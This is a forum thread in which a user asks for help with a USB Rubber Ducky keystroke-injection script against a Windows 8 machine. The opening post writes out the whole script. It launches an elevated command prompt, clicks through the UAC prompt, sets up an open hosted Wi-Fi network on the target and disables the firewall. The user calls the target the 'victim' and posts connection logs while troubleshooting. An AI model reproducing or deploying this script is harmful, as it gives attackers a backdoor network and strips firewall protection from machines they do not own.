michael_kent123 Posted May 8, 2014 Share Posted May 8, 2014 (edited) Hello,I have a problem with the following ducky script.DELAY 3000GUI rDELAY 2000STRING powershell Start-Process cmd -Verb runAsDELAY 1000ENTERDELAY 10000LEFTARROWENTERDELAY 2000STRING netsh wlan set hostednetwork mode=allow ssid=network key=whateverENTERDELAY 2000STRING netsh wlan start hostednetworkENTERDELAY 2000STRING netsh firewall set opmode disableENTERDELAY 2000STRING exitENTERI do what Darren does in "What's Up With the Duck?": The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out.This is what a successful connection from me to my AP looks like:[68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88[68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3)[68488.334924] wlan0: authenticated[68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3)[68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2)[68488.352677] wlan0: associated[68488.352980] cfg80211: Calling CRDA for country: AL[68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)[68488.362978] cfg80211: Regulatory domain changed to country: AL[68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)[68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm)[...]I disconnect deliberately:[68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3)[68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings[68529.970621] cfg80211: Restoring regulatory settingsHere is what happens when I connect to 'network'.[69302.952696] wlan0: authenticate with 21:32:12:7a:40:42[69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3)[69302.970611] wlan0: authenticated[69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3)[69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1)[69302.992791] wlan0: associated[69302.993017] cfg80211: Calling CRDA for country: AL[69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule:[69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)[...]I am deauthenticated involuntarily:[69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3)[69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings[69348.373042] cfg80211: Restoring regulatory settingsI don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box.Does anyone know why I cannot connect to 'network'. Thanks! Edited May 8, 2014 by michael_kent123 Quote Link to comment Share on other sites More sharing options...
michael_kent123 Posted May 10, 2014 Author Share Posted May 10, 2014 Just to expand on the above. I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address. However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself. When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal. Does anyone have any ideas? Why would it work on one Windows but not on the other? Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 11, 2014 Share Posted May 11, 2014 "Windows undocumented features". Seriously though, I have no idea. Quote Link to comment Share on other sites More sharing options...
michael_kent123 Posted May 13, 2014 Author Share Posted May 13, 2014 Perhaps I am missing something obvious. I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine. Is this correct? Thanks. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.